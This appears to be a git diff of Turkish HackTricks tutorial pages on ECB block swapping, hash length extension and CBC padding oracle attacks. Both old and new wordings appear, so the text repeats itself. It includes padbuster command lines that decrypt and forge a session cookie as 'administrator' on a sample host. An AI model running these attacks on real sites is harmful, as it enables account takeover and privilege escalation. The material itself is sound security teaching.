\x23U\xE45K\xCB\x21\xC8\xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4
```
Önceden yaratılan `\x23U\xE45K\xCB\x21\xC8` desenini sadece `a` içeren kullanıcı adıyla görebiliriz.\
Ardından, ilk 8B bloğunu kaldırabilirsiniz ve `admin` kullanıcı adı için geçerli bir çerez elde edersiniz:
Öncekiyle aynı `a` içeren kullanıcı adıyla oluşturulan `\x23U\xE45K\xCB\x21\xC8` desenini görebiliriz.\
Sonra, ilk 8B bloğunu kaldırabilir ve `admin` kullanıcı adı için geçerli bir çerez elde edersiniz:
```
\xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4
```
## Blokları Taşımak
Birçok veritabanında `WHERE username='admin';` veya `WHERE username='admin ';` _(Ekstra boşluklara dikkat edin)_, arama yapmak aynı anlama gelir.
Birçok veritabanında `WHERE username='admin';` veya `WHERE username='admin ';` aramak aynı sonucu verir _(Ekstra boşluklara dikkat)_
Bu nedenle, `admin` kullanıcısını taklit etmek için başka bir yol şu şekilde olabilir:
Bu nedenle, kullanıcı `admin`'i taklit etmenin başka bir yolu şöyle olabilir:
* `len(<username>) + len(<delimiter) % len(block)` şeklinde bir kullanıcı adı oluşturun. `8B` blok boyutuyla `username ` adında bir kullanıcı adı oluşturabilirsiniz. `|` ayırıcı ile `<username><delimiter>` parçası 2 adet 8B blok oluşturacaktır.
* Ardından, kullanıcıyı taklit etmek istediğimiz kullanıcı adını ve boşlukları içeren tam bir blok sayısı oluşturan bir şifre oluşturun, örneğin: `admin `
* `len(<username>) + len(<delimiter) % len(block)` şeklinde bir kullanıcı adı oluşturun. `8B` blok boyutuyla `username ` adında bir kullanıcı adı oluşturabilirsiniz, `|` ayraç ile `<username><delimiter>` parçası 2 adet 8B'lik blok oluşturacaktır.
* Ardından, istediğimiz kullanıcı adını ve boşlukları içeren tam sayıda bloğu dolduracak bir şifre oluşturun, örneğin: `admin `
Bu kullanıcının çerezi 3 bloktan oluşacaktır: ilk 2 blok kullanıcı adı + ayırıcı blokları ve üçüncü blok (kullanıcı adını taklit eden şifre): `username |admin `
Bu kullanıcının çerezi 3 bloktan oluşacaktır: ilk 2 blok kullanıcı adı + ayraç blokları ve üçüncüsü (kullanıcı adını taklit eden) şifre bloğu: `username |admin `
**Sonra, sadece ilk bloğu son blokla değiştirin ve `admin` kullanıcısını taklit edeceksiniz: `admin |username`**
**Sonra, sadece ilk bloğu son blokla değiştirin ve `admin` kullanıcısını taklit etmiş olacaksınız: `admin |username`**
## Referanslar
* [http://cryptowiki.net/index.php?title=Electronic_Code_Book\_(ECB)](http://cryptowiki.net/index.php?title=Electronic_Code_Book_\(ECB\))
<details>
<summary><strong>AWS hackleme konusunda sıfırdan kahramana dönüşün</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> ile öğrenin!</strong></summary>
HackTricks'i desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamınızı yapmak veya HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz olan [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'da takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
</details>

View file

@ -1,42 +1,43 @@
{% hint style="success" %}
Öğren ve AWS Hacking pratiği yap:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Öğren ve GCP Hacking pratiği yap: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekle</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR göndererek HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol et!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katıl veya [**telegram grubuna**](https://t.me/peass) katıl veya **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**'ı takip et**.
* **Hacking püf noktalarını paylaşmak için PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulun.
</details>
{% endhint %}
# Saldırının Özeti
Bir sunucuyu hayal edin, bu sunucu bazı **verileri** imzalıyor, bilinen açık metin verilerine bir **gizli** ekleyerek ve ardından bu veriyi karma ile işleyerek. Eğer şunları biliyorsanız:
Bir sunucuyu hayal edin ki **bazı verileri** imzalıyor, bunu yaparken bilinen açık metin verilerine bir **gizli** ekleyip sonra bu veriyi karma işlemine tabi tutuyor. Eğer şunları biliyorsanız:
* **Gizli bilginin uzunluğu** (bu aynı zamanda belirli bir uzunluk aralığından kaba kuvvet saldırısı ile de bulunabilir)
* **Açık metin verisi**
* **Algoritma (ve bu saldırıya karşı savunmasız)**
* **Dolgulama biliniyor**
* Genellikle varsayılan bir dolgulama kullanılır, bu yüzden diğer 3 gereklilik karşılanıyorsa, bu da karşılanır
* Dolgulama, gizli bilgi+veri uzunluğuna bağlı olarak değişir, bu yüzden gizli bilginin uzunluğuna ihtiyaç vardır
* **Algoritma (ve bu saldırıya karşı savunmasız olması)**
* **Doldurma biliniyor**
* Genellikle varsayılan bir doldurma kullanılır, bu yüzden diğer 3 gereklilik karşılanıyorsa, bu da karşılanır
* Doldurma, gizli veri + veri uzunluğuna bağlı olarak değişir, bu yüzden gizli bilginin uzunluğuna ihtiyaç vardır
O zaman, bir **saldırganın** **veri ekleyebilmesi** ve **önceki veri + eklenen veri** için geçerli bir **imza oluşturabilmesi** mümkündür.
O zaman, bir **saldırganın** **veri ekleyip** önceki veri + eklenen veri için geçerli bir **imza oluşturması** mümkündür.
## Nasıl?
Temelde savunmasız algoritmalar, öncelikle bir veri bloğunu karma ile işleyerek karma oluştururlar, ve ardından, **önceki** oluşturulan **karmadan** (durumdan) başlayarak, **bir sonraki veri bloğunu eklerler** ve **karma işlerler**.
Temelde savunmasız algoritmalar, öncelikle bir veri bloğunu karma işlemine tabi tutarak karma değerlerini oluşturur ve ardından, **önceki** oluşturulan **karma** (durum) **veriden** başlayarak **bir sonraki veri bloğunu ekler** ve **karma işlemine tabi tutar**.
Sonra, gizli bilginin "gizli" ve verinin "veri" olduğunu hayal edin, "gizliveri"nin MD5'i 6036708eba0d11f6ef52ad44e8b74d5b.\
Bir saldırgan "ekle" dizesini eklemek isterse:
Öyleyse, gizli bilginin "gizli" ve verinin "veri" olduğunu hayal edin, "gizliveri"nin MD5'i 6036708eba0d11f6ef52ad44e8b74d5b.\
Bir saldırganın "ekle" dizesini eklemek istemesi durumunda:
* 64 "A"nın MD5'ini oluşturur
* Daha önceden başlatılmış karma durumunu 6036708eba0d11f6ef52ad44e8b74d5b olarak değiştirir
* "ekle" dizesini ekler
* Karmayı tamamlar ve sonuçta elde edilen karma, "gizli" + "veri" + "dolgulama" + "ekle" için **geçerli bir tane olacaktır**
* 64 "A"nın MD5'ini oluştur
* Önceden başlatılmış karma işleminin durumunu 6036708eba0d11f6ef52ad44e8b74d5b olarak değiştir
* "ekle" dizesini ekleyin
* Karma işlemini tamamlayın ve elde edilen karma, "gizli" + "veri" + "doldurma" + "ekle" için **geçerli bir** olacaktır
## **Araç**
@ -44,19 +45,20 @@ Bir saldırgan "ekle" dizesini eklemek isterse:
## Referanslar
Bu saldırının iyi açıklandığını bulabilirsiniz [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks)
Bu saldırının iyi açıklandığı yeri [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks) adresinde bulabilirsiniz.
{% hint style="success" %}
Öğren ve AWS Hacking pratiği yap:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Öğren ve GCP Hacking pratiği yap: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekle</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR göndererek HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol et!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katıl veya [**telegram grubuna**](https://t.me/peass) katıl veya **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**'ı takip et**.
* **Hacking püf noktalarını paylaşmak için PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulun.
</details>
{% endhint %}

View file

@ -1,55 +1,56 @@
{% hint style="success" %}
Öğren ve AWS Hacking pratiği yap:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Öğren ve GCP Hacking pratiği yap: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> ile sıfırdan kahraman olmak için AWS hackleme öğrenin<strong>!</strong></summary>
<summary>HackTricks'i Destekle</summary>
HackTricks'ı desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamınızı görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünleri**](https://peass.creator-spring.com)'ni edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'da takip edin**.
* Hacking hilelerinizi [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına PR göndererek paylaşın.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol et!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katıl veya [**telegram grubuna**](https://t.me/peass) katıl veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip et.**
* **Hacking püf noktalarını paylaşmak için PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulun.
</details>
{% endhint %}
# CBC - Şifre Blok Zinciri
# CBC - Cipher Block Chaining
CBC modunda, **önceki şifrelenmiş blok bir IV** olarak kullanılır ve bir sonraki blokla XOR işlemi yapılır:
CBC modunda **önceki şifrelenmiş blok IV olarak** kullanılır ve bir sonraki blokla XOR işlemi yapılır:
![https://defuse.ca/images/cbc\_encryption.png](https://defuse.ca/images/cbc\_encryption.png)
CBC'yi şifrelemek için **ters** **işlemler** yapılır:
CBC'yi şifrelemek için **zıt işlemler** yapılır:
![https://defuse.ca/images/cbc\_decryption.png](https://defuse.ca/images/cbc\_decryption.png)
Dikkat edilmesi gereken nokta, bir **şifreleme anahtarı** ve bir **IV** kullanılmasıdır.
Dikkat edilmesi gereken **şifreleme anahtarı** ve **IV** kullanılmasıdır.
# Mesaj Dolgusu
Şifreleme **sabit** **boyutlu bloklar** halinde gerçekleştirildiği için, genellikle **son** **bloğu tamamlamak** için **dolguya** ihtiyaç duyulur.\
Genellikle **PKCS7** kullanılır ve bloğu tamamlamak için gereken **bayt sayısını tekrarlayan bir dolgu** oluşturur. Örneğin, son blokta eksik olan 3 bayt ise dolgu `\x03\x03\x03` olacaktır.
Şifreleme **sabit boyutlu bloklarda** gerçekleştirildiği için genellikle **son bloğu tamamlamak için dolgu** gereklidir.\
Genellikle **PKCS7** kullanılır, bu da bloğu **tamamlamak için gereken byte sayısını tekrarlayan bir dolgu** oluşturur. Örneğin, son blokta 3 byte eksikse, dolgu `\x03\x03\x03` olacaktır.
**8 baytlık 2 blok** ile daha fazla örneğe bakalım:
**8 byte uzunluğunda 2 blok** için daha fazla örneklerimize bakalım:
| bayt #0 | bayt #1 | bayt #2 | bayt #3 | bayt #4 | bayt #5 | bayt #6 | bayt #7 | bayt #0 | bayt #1 | bayt #2 | bayt #3 | bayt #4 | bayt #5 | bayt #6 | bayt #7 |
| byte #0 | byte #1 | byte #2 | byte #3 | byte #4 | byte #5 | byte #6 | byte #7 | byte #0 | byte #1 | byte #2 | byte #3 | byte #4 | byte #5 | byte #6 | byte #7 |
| ------- | ------- | ------- | ------- | ------- | ------- | ------- | ------- | -------- | -------- | -------- | -------- | -------- | -------- | -------- | -------- |
| P | A | S | S | W | O | R | D | 1 | 2 | 3 | 4 | 5 | 6 | **0x02** | **0x02** |
| P | A | S | S | W | O | R | D | 1 | 2 | 3 | 4 | 5 | **0x03** | **0x03** | **0x03** |
| P | A | S | S | W | O | R | D | 1 | 2 | 3 | **0x05** | **0x05** | **0x05** | **0x05** | **0x05** |
| P | A | S | S | W | O | R | D | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** |
Son örnekte **son blok dolu olduğu için sadece dolguyla başka bir blok oluşturuldu**.
Son örnekte **son bloğun dolu olduğuna** dikkat edin, bu yüzden sadece dolgu ile başka bir blok oluşturuldu.
# Dolgu Oracle
# Padding Oracle
Bir uygulama şifrelenmiş verileri çözerken, önce verileri çözer; ardından dolguyu kaldırır. Dolgu temizliği sırasında, **geçersiz bir dolgu algılanabilir bir davranışı tetiklerse**, bir **dolgu oracle zafiyeti** vardır. Algılanabilir davranış bir **hata**, **sonuç eksikliği** veya **daha yavaş bir yanıt** olabilir.
Bir uygulama şifrelenmiş verileri şifre çözme işleminden sonra önce veriyi şifre çözecek; ardından dolguyu kaldıracaktır. Dolgu temizliği sırasında, **geçersiz bir dolgu algılanabilir bir davranışı tetiklerse**, bir **padding oracle açığı** oluşur. Algılanabilir davranış bir **hata**, **sonuçların eksikliği** veya **daha yavaş bir yanıt** olabilir.
Bu davranışı tespit ederseniz, **şifrelenmiş verileri çözebilir** ve hatta **herhangi bir açık metni şifreleyebilirsiniz**.
Bu davranışı tespit ederseniz, **şifrelenmiş verileri şifre çözebilir** ve hatta **herhangi bir açık metni şifreleyebilirsiniz**.
## Nasıl sömürülür
Bu tür bir zafiyeti sömürmek için [https://github.com/AonCyberLabs/PadBuster](https://github.com/AonCyberLabs/PadBuster) kullanabilir veya sadece şunları yapabilirsiniz
Bu tür bir ığı sömürmek için [https://github.com/AonCyberLabs/PadBuster](https://github.com/AonCyberLabs/PadBuster) kullanabilir veya sadece devam edebilirsiniz.
```
sudo apt-get install padbuster
```
@ -57,25 +58,25 @@ Bir sitenin çerezinin savunmasız olup olmadığını test etmek için şunlar
```bash
perl ./padBuster.pl http://10.10.10.10/index.php "RVJDQrwUdTRWJUVUeBKkEA==" 8 -encoding 0 -cookies "login=RVJDQrwUdTRWJUVUeBKkEA=="
```
**Kodlama 0**, **base64** kullanıldığı anlamına gelir (ancak diğerleri de mevcuttur, yardım menüsünü kontrol edin).
**Kodlama 0**, **base64**'ün kullanıldığı anlamına gelir (ancak diğerleri de mevcuttur, yardım menüsünü kontrol edin).
Ayrıca, bu zafiyeti yeni verileri şifrelemek için **kötüye kullanabilirsiniz**. Örneğin, çerezin içeriği "**_**user=MyUsername**_**" ise, bunu "\_user=administrator\_" olarak değiştirebilir ve uygulama içinde ayrıcalıkları yükseltebilirsiniz. Aynı işlemi `-plaintext` parametresini belirterek `paduster` kullanarak da yapabilirsiniz:
Bu zafiyeti yeni verileri şifrelemek için de **kötüye kullanabilirsiniz. Örneğin, çerezin içeriğinin "**_**user=MyUsername**_**" olduğunu varsayalım, sonra bunu "\_user=administrator\_" olarak değiştirebilir ve uygulama içinde ayrıcalıkları yükseltebilirsiniz. Ayrıca, `-plaintext` parametresini belirterek `paduster` kullanarak da yapabilirsiniz:
```bash
perl ./padBuster.pl http://10.10.10.10/index.php "RVJDQrwUdTRWJUVUeBKkEA==" 8 -encoding 0 -cookies "login=RVJDQrwUdTRWJUVUeBKkEA==" -plaintext "user=administrator"
```
Eğer site savunmasızsa, `padbuster` otomatik olarak hata oluştuğunda bunu bulmaya çalışacaktır, ancak hata mesajını da **-error** parametresini kullanarak belirtebilirsiniz.
Eğer site savunmasızsa, `padbuster` otomatik olarak dolgu hatası meydana geldiğinde bulmaya çalışacaktır, ancak ayrıca hata mesajını belirtmek için **-error** parametresini de kullanabilirsiniz.
```bash
perl ./padBuster.pl http://10.10.10.10/index.php "" 8 -encoding 0 -cookies "hcon=RVJDQrwUdTRWJUVUeBKkEA==" -error "Invalid padding"
```
## Teori
**Özet olarak**, farklı dolguları oluşturmak için kullanılabilecek doğru değerleri tahmin ederek şifrelenmiş verilerin şifresini çözmeye başlayabilirsiniz. Ardından, dolgu orak saldırısı, doğru değeri tahmin ederek 1, 2, 3 vb. bir dolgu oluşturan doğru değeri tahmin ederek, sona doğru baytları şifrelemeye başlar.
**Özetle**, şifrelenmiş verileri şifresini çözmeye başlayabilirsiniz, doğru değerleri tahmin ederek **farklı dolgu**ları oluşturmak için kullanılabilecek. Ardından, dolgu oracle saldırısı, hangisinin doğru değeri olacağını tahmin ederek **1, 2, 3 vb. dolgu oluşturan** doğru değeri tahmin ederek baştan sona doğru baytları şifrelemeye başlayacaktır.
![](<../.gitbook/assets/image (629) (1) (1).png>)
E0 ile E15 arasındaki baytlardan oluşan **2 blok** şeklinde olan bazı şifrelenmiş metinlere sahip olduğunuzu hayal edin.\
**Son** **bloğu** (**E8** ile **E15**) **şifrelemek** için, tüm blok "blok şifre çözme" işleminden geçer ve ara baytlar I0 ile I15 oluşturur.\
Son olarak, her ara bayt önceki şifrelenmiş baytlarla (E0 ile E7) **XOR** edilir. Yani:
**E0'den E15'e** kadar olan baytlar tarafından oluşturulan **2 bloktan** oluşan bazı şifrelenmiş metinler olduğunu hayal edin.\
**Son bloğu** (**E8** ile **E15**) **şifrelemek** için, tüm blok "blok şifre çözme" işleminden geçer ve **ara baytlar I0'dan I15'e** oluşturur.\
Son olarak, her ara bayt önceki şifrelenmiş baytlarla (E0'dan E7'ye) **XOR** edilir. Yani:
* `C15 = D(E15) ^ E7 = I15 ^ E7`
* `C14 = I14 ^ E6`
@ -83,42 +84,43 @@ Son olarak, her ara bayt önceki şifrelenmiş baytlarla (E0 ile E7) **XOR** edi
* `C12 = I12 ^ E4`
* ...
Şimdi, `C15` `0x01` olduğunda `E7` değiştirilebilir, bu da doğru bir dolgu olacaktır. Bu durumda: `\x01 = I15 ^ E'7`
Şimdi, `C15` **0x01** olduğunda **`E7` değiştirilebilir** ve bu da doğru bir dolgu olacaktır. Bu durumda: `\x01 = I15 ^ E'7`
Bu nedenle, E'7 bulunarak I15 hesaplanabilir: `I15 = 0x01 ^ E'7`
Bu nedenle, `E'7` bulunduğunda, **I15 hesaplanabilir**: `I15 = 0x01 ^ E'7`
Bu bize C15'i hesaplama olanağı sağlar: `C15 = E7 ^ I15 = E7 ^ \x01 ^ E'7`
Bu bize **C15'i hesaplama** olanağı sağlar: `C15 = E7 ^ I15 = E7 ^ \x01 ^ E'7`
C15'i bildikten sonra, bu sefer `\x02\x02` dolgusunu brute-force yaparak C14'ü hesaplamak mümkündür.
**C15** bilindiğine göre, şimdi **C14 hesaplanabilir**, ancak bu sefer `\x02\x02` dolgusunu kaba kuvvet uygulayarak.
Bu brute-force, öncekine benzer karmaşıklığa sahiptir çünkü 0x02 değerine sahip olan E''15'i hesaplamak mümkündür: `E''7 = \x02 ^ I15`, bu yüzden sadece C14'ü 0x02'ye eşit olan E'14'ü bulmak gerekmektedir.\
Sonra, şifrelemeyi çözmek için aynı adımları C14 için yapın: **`C14 = E6 ^ I14 = E6 ^ \x02 ^ E''6`**
Bu BF, öncekiyle aynı kadar karmaşıktır çünkü 0x02 değerine sahip `E''15`'i hesaplamak mümkündür: `E''7 = \x02 ^ I15` bu yüzden sadece **`C14``0x02`'ye eşit olan `E'14`'ü bulmak gereklidir.\
Sonra, C14'ü şifrelemek için aynı adımları uygulayın: **`C14 = E6 ^ I14 = E6 ^ \x02 ^ E''6`**
**Tüm şifreli metni çözmek için bu zinciri takip edin.**
## Zafiyetin Tespiti
Bir hesap kaydedin ve bu hesapla oturum açın.\
Eğer birçok kez oturum açarsanız ve her seferinde **aynı çerez** alırsanız, uygulamada muhtemelen **bir şeyler yanlış**. Her oturum açtığınızda çerezin **benzersiz olması** gerekir. Eğer çerez **her zaman** **aynı** ise, muhtemelen her zaman geçerli olacak ve **geçersiz kılmanın bir yolu olmayacak**.
Eğer **çok kez oturum açarsanız** ve her zaman **aynı çerez**i alırsanız, uygulamada muhtemelen **bir sorun** var demektir. Geri gönderilen çerez her oturum açtığınızda **benzersiz olmalıdır**. Eğer çerez **her zaman** **aynıysa**, muhtemelen her zaman geçerli olacak ve **geçersiz kılacak bir yol olmayacaktır**.
Şimdi, çerezi **değiştirmeye** çalışırsanız, uygulamadan bir **hata** aldığınızı görebilirsiniz.\
Ancak, padbuster gibi bir araç kullanarak dolgu değerini brute-force yaparsanız, farklı bir kullanıcı için geçerli olan başka bir çerez elde edebilirsiniz. Bu senaryo, padbuster için büyük olasılıkla savunmasızdır.
Şimdi, çerezi **değiştirmeyi denerseniz**, uygulamadan bir **hata** aldığınızı görebilirsiniz.\
Ancak dolgu (örneğin padbuster kullanarak) kaba kuvvet uygularsanız, farklı bir kullanıcı için geçerli başka bir çerez elde edebilirsiniz. Bu senaryo büyük olasılıkla padbuster'a karşı savunmasızdır.
## Referanslar
* [https://en.wikipedia.org/wiki/Block\_cipher\_mode\_of\_operation](https://en.wikipedia.org/wiki/Block\_cipher\_mode\_of\_operation)
{% hint style="success" %}
AWS Hacking öğrenin ve uygulayın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hackleme konusunda sıfırdan kahramana dönüşmek için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>'ı öğrenin!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'i desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamınızı yapmak veya HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz olan [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'ı takip edin.**
* **Hacking hilelerinizi HackTricks ve HackTricks Cloud** github reposuna **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına PR gönderin.
</details>
{% endhint %}

View file

@ -1,40 +1,23 @@
{% hint style="success" %}
Öğren ve AWS Hacking pratiği yap:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Öğren ve GCP Hacking pratiği yap: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hackleme becerilerini sıfırdan kahraman seviyesine öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekle</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamınızı görmek veya HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter'da** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'ı takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol et!
